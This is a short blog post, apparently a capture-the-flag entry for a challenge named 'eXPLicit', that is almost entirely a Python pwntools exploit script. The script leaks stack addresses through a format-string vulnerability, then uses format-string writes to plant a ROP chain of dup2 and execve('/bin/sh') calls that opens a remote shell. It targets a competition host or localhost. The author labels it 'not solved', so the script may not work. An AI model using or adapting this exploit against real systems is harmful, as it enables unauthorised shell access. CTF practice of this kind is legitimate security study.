Monday, September 15, 2014

eXPLicit

eXPLicit (not solved) source 
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from pwn import *
from libformatstr import *

REMOTE = 0

if REMOTE:
    host = '88.87.208.163'
    port = 7070
else:
    host = '127.0.0.1'
    port = 7070

def connect():
    return remote(host, port)

def retrieve_val(res):
    m = re.search('Your number is (.+) which is too low.', res)
    if m:
        leak = m.group(1)
        return leak
    else:
        return None

def dump_stack():
    for i in range(1, 100):
        payload = (
            "%%%d$x" % i +
            '\n'
        )
        s.sendafter('Pick a number between 0 and 20: ', payload)
        res = s.recvuntil('which is too low.')
        leak = retrieve_val(res)
        if leak:
            print '%d: %s' % (i, leak)
        else:
            print buf
    s.interactive()

def send_fmt(payload):
    s.sendafter('Pick a number between 0 and 20: ', payload + '\n')

bss = 0x80d6080 + 0x100

int80 = 0x8082715  # int 0x80; ret
popeax = 0x80a8ff6 # pop eax; ret
popecx_ebx = 0x8060a7d # pop ecx; pop ebx; ret
popedx_ecx_ebx = 0x8060a7c # pop edx; pop ecx; pop ebx; ret

s = connect()

#dump_stack()

send_fmt('%69$x')
buf = s.recvuntil('which is too low.')
retaddr = int(retrieve_val(buf), 16) - 76 # offset
log.info('retaddr = %x' % retaddr)

# dup2(4, 0)
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x3f
p[retaddr+4*2] = popecx_ebx
p[retaddr+4*3] = 0
p[retaddr+4*4] = 0x4
p[retaddr+4*5] = int80
send_fmt(p.payload(6))
retaddr += 4*6

# dup2(4, 0)
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x3f
p[retaddr+4*2] = popecx_ebx
p[retaddr+4*3] = 1
p[retaddr+4*4] = 0x4
p[retaddr+4*5] = int80
send_fmt(p.payload(6))
retaddr += 4*6

# execve("/bin/sh", ["/bin/sh", NULL], NULL)
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x0b
p[retaddr+4*2] = popedx_ecx_ebx
p[retaddr+4*3] = 0
p[retaddr+4*4] = bss+4*1
p[retaddr+4*5] = bss+4*3
p[retaddr+4*6] = int80
send_fmt(p.payload(6))

# ["/bin/sh", NULL]
p = FormatStr()
p[bss] = retaddr+4*1
p[bss+4*1] = bss+4*3
p[bss+4*2] = 0
p[bss+4*3] = '/bin'
p[bss+4*4] = '/sh\0'
send_fmt(p.payload(6))

s.interactive()
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)